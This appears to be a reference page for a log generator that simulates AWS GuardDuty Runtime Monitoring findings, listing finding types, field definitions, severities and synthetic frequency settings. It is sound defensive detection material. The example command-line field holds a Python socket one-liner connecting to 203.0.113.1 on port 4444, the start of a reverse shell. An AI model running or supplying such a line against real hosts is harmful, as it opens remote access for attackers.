GuardDuty Runtime Monitoring Finding Types
Threat detection based on OS-level runtime behavior
AWS GuardDuty Runtime Monitoring finding types detecting threats based on operating system-level behavior from Amazon EC2 hosts and containers in Amazon EKS clusters, Amazon ECS workloads, and Fargate tasks, including malicious file execution, privilege escalation, container escape, process injection, cryptocurrency mining, command and control activity, and defense evasion techniques
runtime-monitoring
process-monitoring
container-security
threat-detection
malware-detection
JSON Format
23 Fields
High Frequency
Generator
Overview
Runtime Monitoring analyzes operating system-level behavior from EC2 hosts and containers in EKS, ECS, and Fargate to detect malicious activity including malicious file execution, privilege escalation, container escape, process injection, cryptocurrency mining, command and control communication, Tor network usage, reverse shells, fileless execution, and defense evasion techniques. Uses runtime logs containing process, file, and network activity context.
When Generated:
- Cryptocurrency-related IP addresses queried from EC2 instance or container
- Command and control server communication detected from runtime processes
- Tor network connections detected (relay or client activity)
- Blackhole or drop point traffic patterns detected
- New binary execution detected on instance or container
- Docker socket accessed for privilege escalation
- Container escape attempts via runc or CGroups modification
- Process injection attempts detected (proc, ptrace, virtual memory write)
- Reverse shell connections initiated from instances or containers
- Fileless execution detected (code execution without disk writes)
- Cryptocurrency miner execution detected
- New libraries loaded into running processes
- Container mounting host directories detected
- Suspicious tool or command execution detected
- Ptrace anti-debugging techniques detected
- Malicious file execution detected
- Suspicious shell creation from network services
- Privilege escalation to root via suspicious setuid execution
- Kernel module loaded on EC2 instance
Security Relevance:
CriticalCompliance:
PCI-DSS 11.4, 11.5
HIPAA 164.308(a)(1)
SOC 2 CC7.2, CC7.4
ISO 27001 A.12.4.1, A.12.4.2
NIST CSF PR.DS-5, DE.AE-3
CIS Docker Benchmark 4.1-4.12
NIST SP 800-190
Frequency Notes:
Runtime Monitoring findings vary significantly based on workload activity, container usage, and threat landscape. Production environments typically see 20-80 findings per day. Cryptocurrency mining and C&C activity are high-severity but lower frequency (5-20 per day). Process injection, container escape, and privilege escalation are critical but rare (1-10 per day). Suspicious command execution is common but lower severity (10-50 per day). Kernel module loading is very rare but critical (0-2 per day). Frequency increases during active attacks and decreases during quiet periods.
Resources
Documentation
- Runtime Monitoring Finding Types official
- Remediating Runtime Monitoring Findings official
- GuardDuty Runtime Monitoring official
- Runtime Agent Installation official
Tools
-
AWS GuardDuty Console
Web interface for viewing and managing Runtime Monitoring findings
-
AWS Security Hub
Centralized security findings including GuardDuty Runtime Monitoring findings
-
AWS Systems Manager
Install and manage GuardDuty runtime agents
Generation Configuration
Base Frequency: 60 events/hour
Time Patterns:
business_hours
night_hours
weekend
Business Hours Multiplier: 2.0x
Night Hours Multiplier: 2.5x
Weekend Multiplier: 1.5x
Field Definitions
Complete field reference for this event type with data types, descriptions, and example values.
| Field Name | Type | Required | Format | Description | Example | Possible Values |
|---|---|---|---|---|---|---|
|
detail.type
Source: random_choice() of 42 Runtime Monitoring finding types
|
String | Required | — | Runtime Monitoring finding type indicating attack tactic and detection method |
Execution:Runtime/MaliciousFileExecuted
|
CryptoCurrency:Runtime/BitcoinTool.B
— Instance or container querying IP associated with cryptocurrency activity
Backdoor:Runtime/C&CActivity.B
— Instance or container querying IP associated with known C&C server
UnauthorizedAccess:Runtime/TorRelay
— Instance or container making connections to Tor network as relay
UnauthorizedAccess:Runtime/TorClient
— Instance or container making connections to Tor Guard or Authority node
Trojan:Runtime/BlackholeTraffic
— Blackhole traffic pattern detected
Trojan:Runtime/DropPoint
— DropPoint trojan activity detected
Execution:Runtime/NewBinaryExecuted
— New binary execution detected on instance or container
PrivilegeEscalation:Runtime/DockerSocketAccessed
— Docker socket accessed for privilege escalation
PrivilegeEscalation:Runtime/RuncContainerEscape
— Container escape attempt via runc detected
PrivilegeEscalation:Runtime/CGroupsReleaseAgentModified
— CGroups release agent modified for container escape
DefenseEvasion:Runtime/ProcessInjection.Proc
— Process injection via /proc filesystem detected
DefenseEvasion:Runtime/ProcessInjection.Ptrace
— Process injection via ptrace detected
Execution:Runtime/ReverseShell
— Reverse shell connection detected
DefenseEvasion:Runtime/FilelessExecution
— Fileless execution detected (code execution without disk writes)
Impact:Runtime/CryptoMinerExecuted
— Cryptocurrency miner execution detected
Execution:Runtime/MaliciousFileExecuted
— Known malicious executable file execution detected
PrivilegeEscalation:Runtime/ElevationToRoot
— Privilege escalation to root via suspicious setuid execution
DefenseEvasion:Runtime/KernelModuleLoaded
— Kernel module loaded on EC2 instance indicating kernel-level access attempt
|
|
detail.resource.resourceType
Source: random_choice(['Instance', 'EKSCluster', 'ECSTask', 'Container'])
|
String | Required | — | Type of resource where runtime activity was detected |
Instance
|
Instance
— Amazon EC2 instance
EKSCluster
— Amazon EKS cluster
ECSTask
— Amazon ECS task
Container
— Container running on instance or in cluster
|
|
detail.resource.instanceDetails.instanceId
Source: random_hex(17, 17) with 'i-' prefix
|
String | Optional |
i-{17 hex characters}
|
EC2 instance identifier (when resourceType is Instance) |
i-1234567890abcdef0
|
— |
|
detail.resource.containerDetails
Source: Container metadata from runtime environment
|
Object | Optional | — | Container details (when resourceType is Container or ECSTask) |
{containerRuntime, id, name, image, securityContext}
|
— |
|
detail.service.runtimeDetails.process
Source: Process metadata from runtime agent
|
Object | Required | — | Process information that triggered the finding |
{name, pid, ppid, user, executablePath, commandLine}
|
— |
|
detail.service.runtimeDetails.process.name
Source: Process executable path from runtime agent
|
String | Required |
Full path to executable
|
Name of the process executable |
/usr/bin/python3
|
— |
|
detail.service.runtimeDetails.process.pid
Source: Process ID from operating system
|
Integer | Required |
Integer (1-65535)
|
Process ID (PID) of the process |
1234
|
— |
|
detail.service.runtimeDetails.process.ppid
Source: Parent process ID from operating system
|
Integer | Required |
Integer (1-65535)
|
Parent process ID (PPID) of the process |
1
|
— |
|
detail.service.runtimeDetails.process.user
Source: User name from process credentials
|
String | Required |
Username
|
User name running the process |
root
|
— |
|
detail.service.runtimeDetails.process.userId
Source: User ID from process credentials (0 for root)
|
Integer | Required |
Integer (typically 0-65535)
|
User ID (UID) of the process owner |
0
|
— |
|
detail.service.runtimeDetails.process.euid
Source: Effective user ID from process credentials
|
Integer | Required |
Integer (typically 0-65535)
|
Effective user ID (EUID) of the process |
0
|
— |
|
detail.service.runtimeDetails.process.parentName
Source: Parent process executable path from runtime agent
|
String | Required |
Full path to parent executable
|
Name of the parent process executable |
/usr/sbin/sshd
|
— |
|
detail.service.runtimeDetails.process.executablePath.text
Source: Executable file path from runtime agent
|
String | Required |
Absolute file path
|
Full path to the process executable. Note: File paths may be controlled by malicious actors and should be sanitized when displayed |
/usr/bin/python3
|
— |
|
detail.service.runtimeDetails.process.executableSha256
Source: SHA-256 hash of executable file content
|
String | Required |
64-character hexadecimal string
|
SHA-256 hash of the executable file |
a1b2c3d4e5f6...
|
— |
|
detail.service.runtimeDetails.process.commandLine.text
Source: Process command line arguments from runtime agent
|
String | Required |
Command line string
|
Command line used to execute the process. Note: Command lines may be controlled by malicious actors and should be sanitized when displayed |
python3 -c "import socket; s=socket.socket(); s.connect((\"203.0.113.1\", 4444))"
|
— |
|
detail.service.runtimeDetails.process.workingDirectory.text
Source: Working directory path from runtime agent
|
String | Required |
Absolute directory path
|
Working directory of the process. Note: File paths may be controlled by malicious actors and should be sanitized when displayed |
/tmp
|
— |
|
detail.service.runtimeDetails.context.runtimeContext
Source: Runtime context metadata from runtime agent
|
Object | Optional | — | Runtime context information including memory regions and address space flags |
{addressSpaceFlags, memoryRegions, toolName}
|
— |
|
detail.service.runtimeDetails.context.runtimeContext.toolName
Source: Tool name identified by runtime agent
|
String | Optional |
Tool name
|
Name of the tool or utility used (for SuspiciousTool findings) |
curl
|
— |
|
detail.service.action.networkConnectionAction.remoteIpDetails.ipAddressV4
Source: random_public_ip() for network connection findings
|
String | Optional |
IPv4 address
|
Remote IP address for network-based findings |
203.0.113.42
|
— |
|
detail.service.action.dnsRequestAction.domain
Source: random_choice() of test and malicious domains for DNS findings
|
String | Optional |
Domain name
|
Domain name queried for DNS-based findings |
guarddutyc2activityb.com
|
— |
|
detail.service.additionalInfo.threatListName
Source: random_choice() of threat intelligence list names
|
String | Optional |
Threat list name
|
Name of threat intelligence list that matched |
Amazon
|
Amazon
— AWS threat intelligence (includes Log4j-related threats)
ProofPoint
— ProofPoint threat intelligence feed
Custom Threat List
— Custom user-defined threat list
AWS Threat Intelligence
— AWS managed threat intelligence
Community Threat List
— Community-maintained threat list
|
|
detail.service.additionalInfo.threatName
Source: random_choice() of threat names
|
String | Optional |
Threat name
|
Name of the specific threat identified |
C&C Server
|
C&C Server
— Command and control server
Bitcoin Mining
— Cryptocurrency mining activity
Tor Network
— Tor network node
Log4j Related
— Log4j vulnerability exploitation
Malicious Binary
— Known malicious executable
Container Escape
— Container escape technique
|
|
detail.severity
Source: random_choice([2, 2, 5, 5, 5, 8, 8, 8])
|
Integer | Required | — | Finding severity level (0-10) |
8
|
2
— Low severity (1.0-3.9) - e.g., SuspiciousShellCreated, Discovery:Runtime/SuspiciousCommand
5
— Medium severity (4.0-6.9) - e.g., ElevationToRoot, Persistence:Runtime/SuspiciousCommand
8
— High severity (7.0-8.9) - e.g., MaliciousFileExecuted, C&CActivity, TorClient, KernelModuleLoaded
|
Details
23
Fields
High
Frequency
5
Tags
runtime_moni...
Event Type
Tags:
runtime-monitoring
process-monitoring
container-security
threat-detection
malware-detection
Feedback
No ratings yet